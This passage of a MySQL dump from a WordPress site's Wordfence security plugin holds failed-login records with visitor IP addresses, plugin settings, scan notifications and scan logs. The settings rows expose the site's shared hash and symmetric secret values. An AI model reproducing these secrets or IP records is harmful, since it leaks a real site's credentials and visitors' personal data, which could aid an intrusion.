(479, 4806, 1594820146.861525, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffc6c74860, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(480, 4815, 1594826486.764122, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(481, 4819, 1594828521.282915, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff4ebdaa28, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(482, 4822, 1594832925.571812, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff86d1feba, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(483, 4825, 1594834403.451445, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff8cee1639, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(484, 4827, 1594836715.931714, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa7472d23, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(485, 4849, 1594858546.675003, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23e4d9f0, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),
(486, 4868, 1594879537.567010, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9df5f30e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(487, 4879, 1594917261.845928, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffff68f44a2f, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0'),
(488, 4882, 1594929646.130457, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc7f9e646, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(489, 4884, 1594938546.208284, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff73db8394, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(490, 4893, 1595011712.072348, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffff91ef01b6, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'),
(491, 4894, 1595016062.005485, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23bd67a0, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(492, 4896, 1595020103.358896, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(493, 4920, 1595039485.911988, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2875ea21, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0'),
(494, 4983, 1595073031.520964, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff72688dda, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36');
INSERT INTO `zdenl_wflogins` (`id`, `hitID`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(495, 4983, 1595073031.567080, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff72688dda, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(496, 4987, 1595096817.347449, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff25e023b1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(497, 4987, 1595096817.415570, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff25e023b1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(498, 4994, 1595138857.713648, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff1fdc0283, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(499, 5012, 1595245802.241876, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc658e, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(500, 5018, 1595271019.026132, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23e41915, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(501, 5030, 1595333801.248480, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955ef6e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(502, 5033, 1595348337.737708, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff654baaf8, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),
(503, 5034, 1595352322.498749, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(504, 5056, 1595424993.952852, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(505, 5077, 1595508888.330910, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955ef6e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(506, 5086, 1595561795.783767, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6d466422, 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(507, 5090, 1595586309.524922, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a466, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(508, 5100, 1595660830.209573, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff178140b5, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(509, 5132, 1595799437.530466, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd4538d59, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(510, 5136, 1595818492.429016, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb2207bcb, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(511, 5141, 1595845750.160965, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd06d0e66, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(512, 5146, 1595868164.031087, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff96810818, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(513, 5146, 1595868164.099925, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff96810818, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(514, 5153, 1595910802.948213, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb9dc65ce, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(515, 5288, 1596055837.900551, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc063055e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(516, 5291, 1596065093.946966, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc650a, 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(517, 5291, 1596065094.011014, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc650a, 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(518, 5295, 1596098629.837703, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a466, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(519, 5297, 1596103629.574893, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a463, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(520, 5306, 1596200076.748679, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffdfd7bd88, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(521, 5312, 1596221947.152518, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5e17d2c8, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(522, 5320, 1596256434.089882, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa7473111, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(523, 5350, 1596388350.954508, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955eef4, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(524, 5351, 1596412175.961214, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(525, 5361, 1596480805.127218, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa3accfe0, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(526, 5364, 1596488412.175744, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffdff1047b, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(527, 5364, 1596488412.245663, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffdff1047b, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(528, 5367, 1596512420.979019, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff0ea2ee10, 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12'),
(529, 5367, 1596512421.074527, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff0ea2ee10, 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.12'),
(530, 5379, 1596604315.065187, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a467, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(531, 5380, 1596610421.195949, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffd2387722, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(532, 5401, 1596823685.566732, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2f6a801a, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),
(533, 5407, 1596843755.941521, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff57629b7b, 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(534, 5417, 1596916175.732488, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb2143710, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'),
(535, 5417, 1596916175.777230, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb2143710, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'),
(536, 5418, 1596923439.426545, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955ef6e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(537, 5420, 1596939350.230921, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb221e954, 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(538, 5423, 1596950550.679747, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc05f1e3b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfls_2fa_secrets`
--

CREATE TABLE `zdenl_wfls_2fa_secrets` (
  `id` int(11) UNSIGNED NOT NULL,
  `user_id` bigint(20) UNSIGNED NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `vtime` int(10) UNSIGNED NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfls_settings`
--

CREATE TABLE `zdenl_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfls_settings`
--

INSERT INTO `zdenl_wfls_settings` (`name`, `value`, `autoload`) VALUES
('allow-xml-rpc', '', 'yes'),
('captcha-stats', 0x7b22636f756e7473223a5b302c302c302c302c302c302c302c302c302c302c305d2c22617667223a307d, 'yes'),
('delete-deactivation', '', 'yes'),
('enable-auth-captcha', '', 'yes'),
('global-notices', 0x5b5d, 'yes'),
('ip-source', '', 'yes'),
('ip-trusted-proxies', '', 'yes'),
('last-secret-refresh', 0x31353831333431393733, 'yes'),
('ntp-offset', 0x2d38312e393739353130333037333132, 'yes'),
('recaptcha-threshold', 0x302e35, 'yes'),
('remember-device', '', 'yes'),
('remember-device-duration', 0x32353932303030, 'yes'),
('require-2fa-grace-period-enabled', '', 'yes'),
('require-2fa.administrator', '', 'yes'),
('shared-hash-secret', 0x35373333356365323036353738643761323763353231326666323462363136343862346630326664666365656239386632333539393235393266373635626534, 'yes'),
('shared-symmetric-secret', 0x61643735323431633436613633643938303764653734663930306631363239663837646338353238663131316262626234353334633430383065363531323639, 'yes'),
('use-ntp', 0x31, 'yes'),
('whitelisted', '', 'yes'),
('xmlrpc-enabled', 0x31, 'yes');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfnotifications`
--

CREATE TABLE `zdenl_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) UNSIGNED NOT NULL DEFAULT '1',
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT '1000',
  `ctime` int(10) UNSIGNED NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfnotifications`
--

INSERT INTO `zdenl_wfnotifications` (`id`, `new`, `category`, `priority`, `ctime`, `html`, `links`) VALUES
('site-2IAQAAA', 0, 'wfplugin_scan', 502, 1594734526, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]'),
('site-5QAQAAA', 1, 'wfplugin_scan', 502, 1596980694, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]'),
('site-AEAAAAA', 0, 'wfplugin_scan', 502, 1583848577, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>', '[]'),
('site-AIAAAAA', 1, 'wfplugin_updates', 502, 1596980692, '<a href=\"http://www.ze-dent.com/wp-admin/update-core.php\">Updates are available for WordPress (v5.4.2) and 1 plugin</a>', '[]'),
('site-CYAQAAA', 0, 'wfplugin_scan', 502, 1591882869, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]'),
('site-L4AAAAA', 0, 'wfplugin_scan', 502, 1588775180, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]'),
('site-RQAQAAA', 0, 'wfplugin_scan', 502, 1592401481, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]'),
('site-TYAQAAA', 0, 'wfplugin_scan', 502, 1593698190, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]'),
('site-ZQAQAAA', 0, 'wfplugin_scan', 502, 1593957002, '<a href=\"http://www.ze-dent.com/wp-admin/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>', '[]');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfpendingissues`
--

CREATE TABLE `zdenl_wfpendingissues` (
  `id` int(10) UNSIGNED NOT NULL,
  `time` int(10) UNSIGNED NOT NULL,
  `lastUpdated` int(10) UNSIGNED NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) UNSIGNED NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text,
  `data` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfreversecache`
--

CREATE TABLE `zdenl_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfreversecache`
--

INSERT INTO `zdenl_wfreversecache` (`IP`, `host`, `lastUpdate`) VALUES
(0x00000000000000000000ffff42f94521, 'crawl-66-249-69-33.googlebot.com', 1596950291),
(0x00000000000000000000ffff42f94524, 'crawl-66-249-69-36.googlebot.com', 1596994147),
(0x00000000000000000000ffff42f9453e, 'crawl-66-249-69-62.googlebot.com', 1596956237),
(0x00000000000000000000ffff42f94b5a, 'crawl-66-249-75-90.googlebot.com', 1596956235),
(0x00000000000000000000ffff42f94b5b, 'crawl-66-249-75-91.googlebot.com', 1596994145),
(0x00000000000000000000ffff42f94b5c, 'crawl-66-249-75-92.googlebot.com', 1596950289);

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfsnipcache`
--

CREATE TABLE `zdenl_wfsnipcache` (
  `id` int(10) UNSIGNED NOT NULL,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `type` int(10) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfstatus`
--

CREATE TABLE `zdenl_wfstatus` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `level` tinyint(3) UNSIGNED NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfstatus`
--

INSERT INTO `zdenl_wfstatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES
(12399, 1595770976.076578, 1, 'info', 'Initiating quick scan'),
(12404, 1595770976.128886, 1, 'info', '-------------------'),
(12405, 1595770976.130245, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),
(12406, 1595770976.130819, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(12408, 1595844180.986343, 1, 'info', 'Scheduled Wordfence scan starting at Monday 27th of July 2020 01:03:00 PM'),
(12410, 1595844183.860154, 1, 'info', 'Contacting Wordfence to initiate scan'),
(12417, 1595844191.717500, 2, 'info', 'Unable to access available disk space information'),
(12425, 1595844192.127671, 2, 'info', 'Getting plugin list from WordPress'),
(12426, 1595844192.147796, 2, 'info', 'Found 6 plugins'),
(12427, 1595844192.148606, 2, 'info', 'Getting theme list from WordPress'),
(12428, 1595844192.168675, 2, 'info', 'Found 2 themes'),
(12440, 1595844197.575007, 2, 'info', '500 files indexed'),
(12441, 1595844199.654622, 2, 'info', '1000 files indexed'),
(12442, 1595844199.932857, 2, 'info', '1500 files indexed'),
(12443, 1595844200.549749, 2, 'info', '2000 files indexed'),
(12444, 1595844200.925117, 2, 'info', '2500 files indexed'),
(12445, 1595844201.062735, 2, 'info', '2581 files indexed'),
(12446, 1595844202.590366, 2, 'info', '3081 files indexed'),
(12447, 1595844203.101770, 2, 'info', '3581 files indexed'),
(12448, 1595844206.178434, 2, 'info', '4081 files indexed'),
(12449, 1595844206.432474, 2, 'info', '4581 files indexed'),
(12450, 1595844206.658941, 2, 'info', '5081 files indexed'),
(12451, 1595844206.670737, 2, 'info', '5130 files indexed'),
(12452, 1595844208.253546, 2, 'info', 'Analyzed 100 files containing 1.45 MB of data so far'),
(12453, 1595844209.900275, 2, 'info', 'Analyzed 200 files containing 2.49 MB of data so far'),
(12454, 1595844211.165652, 2, 'info', 'Analyzed 300 files containing 3.82 MB of data so far'),
(12455, 1595844212.291443, 2, 'info', 'Analyzed 400 files containing 6.27 MB of data so far'),
(12456, 1595844213.710069, 2, 'info', 'Analyzed 500 files containing 7.07 MB of data so far'),
(12457, 1595844214.689241, 2, 'info', 'Analyzed 600 files containing 8.2 MB of data so far'),
(12458, 1595844215.556778, 2, 'info', 'Analyzed 700 files containing 10.04 MB of data so far'),
(12459, 1595844216.112710, 2, 'info', 'Analyzed 800 files containing 12.07 MB of data so far'),
(12460, 1595844223.615825, 2, 'info', 'Analyzed 900 files containing 14.64 MB of data so far'),
(12461, 1595844224.801720, 2, 'info', 'Analyzed 1000 files containing 17.51 MB of data so far'),
(12462, 1595844226.279989, 2, 'info', 'Analyzed 1100 files containing 17.83 MB of data so far'),
(12463, 1595844227.238541, 2, 'info', 'Analyzed 1200 files containing 18.39 MB of data so far'),
(12464, 1595844228.053193, 2, 'info', 'Analyzed 1300 files containing 18.7 MB of data so far'),
(12465, 1595844228.894766, 2, 'info', 'Analyzed 1400 files containing 19.66 MB of data so far'),
(12466, 1595844230.328507, 2, 'info', 'Analyzed 1500 files containing 19.88 MB of data so far'),
(12467, 1595844231.074705, 2, 'info', 'Analyzed 1600 files containing 20.85 MB of data so far'),
(12468, 1595844232.009816, 2, 'info', 'Analyzed 1700 files containing 23.56 MB of data so far'),
(12469, 1595844232.247749, 2, 'info', 'Analyzed 1800 files containing 23.59 MB of data so far'),
(12470, 1595844232.625173, 2, 'info', 'Analyzed 1900 files containing 23.62 MB of data so far'),
(12471, 1595844233.478712, 2, 'info', 'Analyzed 2000 files containing 23.97 MB of data so far'),
(12472, 1595844233.959737, 2, 'info', 'Analyzed 2100 files containing 24.72 MB of data so far'),
(12473, 1595844234.472928, 2, 'info', 'Analyzed 2200 files containing 25.44 MB of data so far'),
(12474, 1595844234.789903, 2, 'info', 'Analyzed 2300 files containing 26.1 MB of data so far'),
(12475, 1595844235.177046, 2, 'info', 'Analyzed 2400 files containing 26.13 MB of data so far'),
(12476, 1595844235.674385, 2, 'info', 'Analyzed 2500 files containing 26.15 MB of data so far'),
(12477, 1595844236.065800, 2, 'info', 'Analyzed 2600 files containing 26.18 MB of data so far'),
(12478, 1595844236.333269, 2, 'info', 'Analyzed 2700 files containing 26.21 MB of data so far'),
(12479, 1595844236.640546, 2, 'info', 'Analyzed 2800 files containing 26.24 MB of data so far'),
(12480, 1595844236.892539, 2, 'info', 'Analyzed 2900 files containing 26.27 MB of data so far'),
(12481, 1595844237.269782, 2, 'info', 'Analyzed 3000 files containing 27.49 MB of data so far'),
(12482, 1595844238.829960, 2, 'info', 'Analyzed 3100 files containing 28.46 MB of data so far'),
(12483, 1595844240.760998, 2, 'info', 'Analyzed 3200 files containing 30.12 MB of data so far'),
(12484, 1595844242.181043, 2, 'info', 'Analyzed 3300 files containing 35.62 MB of data so far'),
(12485, 1595844243.303353, 2, 'info', 'Analyzed 3400 files containing 37.34 MB of data so far'),
(12486, 1595844244.403056, 2, 'info', 'Analyzed 3500 files containing 38.12 MB of data so far'),
(12487, 1595844245.472163, 2, 'info', 'Analyzed 3600 files containing 39.19 MB of data so far'),
(12488, 1595844247.219773, 2, 'info', 'Analyzed 3700 files containing 41.82 MB of data so far'),
(12489, 1595844247.935306, 2, 'info', 'Analyzed 3800 files containing 43.56 MB of data so far'),
(12490, 1595844248.676520, 2, 'info', 'Analyzed 3900 files containing 43.95 MB of data so far'),
(12491, 1595844249.321650, 2, 'info', 'Analyzed 4000 files containing 45.31 MB of data so far'),
(12492, 1595844250.282278, 2, 'info', 'Analyzed 4100 files containing 48.72 MB of data so far'),
(12493, 1595844251.347316, 2, 'info', 'Analyzed 4200 files containing 50.24 MB of data so far'),
(12494, 1595844252.845175, 2, 'info', 'Analyzed 4300 files containing 52.26 MB of data so far'),
(12495, 1595844255.013484, 2, 'info', 'Analyzed 4400 files containing 54.47 MB of data so far'),
(12496, 1595844257.437007, 2, 'info', 'Analyzed 4500 files containing 55.73 MB of data so far'),
(12497, 1595844259.361312, 2, 'info', 'Analyzed 4600 files containing 64.6 MB of data so far'),
(12498, 1595844261.292460, 2, 'info', 'Analyzed 4700 files containing 68 MB of data so far'),
(12499, 1595844263.317325, 2, 'info', 'Analyzed 4800 files containing 70.46 MB of data so far'),
(12500, 1595844265.151286, 2, 'info', 'Analyzed 4900 files containing 73.04 MB of data so far'),
(12501, 1595844266.908244, 2, 'info', 'Analyzed 5000 files containing 76.03 MB of data so far'),
(12502, 1595844268.530944, 2, 'info', 'Analyzed 5100 files containing 77.55 MB of data so far'),
(12503, 1595844268.845381, 2, 'info', 'Analyzed 5130 files containing 77.95 MB of data.'),
(12511, 1595844274.494753, 2, 'info', 'Starting scan of file contents'),
(12512, 1595844276.381936, 2, 'info', 'Scanned contents of 35 additional files at 34.48 per second'),
(12513, 1595844277.388124, 2, 'info', 'Scanned contents of 91 additional files at 45.02 per second'),
(12514, 1595844278.400869, 2, 'info', 'Scanned contents of 134 additional files at 44.16 per second'),
